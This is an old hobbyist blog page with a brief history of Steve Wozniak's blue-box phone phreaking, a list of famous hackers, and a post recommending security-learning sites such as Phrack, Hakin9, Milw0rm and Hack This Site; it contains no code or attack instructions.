"Woz" is famous for being the "other Steve" of Apple. Wozniak, along with current Apple CEO Steve Jobs, co-founded Apple Computer. Woz got his start in hacking making blue boxes, devices that bypass telephone-switching mechanisms to make free long-distance calls. After reading an article about phone phreaking in Esquire, Wozniak called up his buddy Jobs. The pair did research on frequencies, then built and sold blue boxes to their classmates in college. Wozniak even used a blue box to call the Pope while pretending to be Henry Kissinger.









Some Other famous Hackers :

Dennis Ritchie and Ken Thompson
John Draper
Johan Helsingius
Eric Steven Raymond
Ian Murphy
John Perry Barlow
Tim Berner Lee

Saturday, July 25, 2009

Hacking sites for learners

0 comments

Well well well..As I already told you,most of people ask me how to become a hacker,and my usual reply is that I cant make you a hacker,but I can tell you how to Phrack..The ultimate hackers zine be one,and its your interest,your passion,your mindset which will drive you to be one.A hacker evolves from many stages,from the lower level script kiddie to the elite level Guru,one needs to be in constant research to develop their soft and hard skills.I m myself learning a lot,and I would like to share 5 Hacking sites,which you must visit,if you want to be an expert in security.

Phrack

Phrack is the granddaddy of all the hacking sites out there,and is the world’s oldest hacker ezine,by hackers,for hacker. Described by Gordon Fyodor as "the best, and by far the longest running hacker zine” covers deep articles on Hacking and Cracking.A heaven for willing learners,Its articles are worth in gold.

Hacki9

Hakin9 offers an in-depth look at both attack and defense techniques and concentrates on difficult technical issues.Hakin9's target readers are those responsible for IT system security, programmers, security specialists, professional administrators, as well as people taking up security issues in their free time.

Milw0rm

When it comes to getting exploits,few sites are as comprehensive and updated as Milw0rm.Milw0rm provides a one stop platform for almost all security experts along the world to publish their new found exploits on the web so that other can study them for good or worse.

Hack this Site

Wanna test your hacking skills ? Hack This Site puts your skills to an ultimate test as it throws you real life challenges of almost every type,Trust me,If you have it in you,visit and complete its missions and nothing can beat you.

2600

A great collection of articles and podcasts on security,one has to visit 2600 to get a feel what hacking is.

I believe you will get better and learn something..

Keep Learning

Followers

 

╚►ITECHNOGURU™◄╝. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com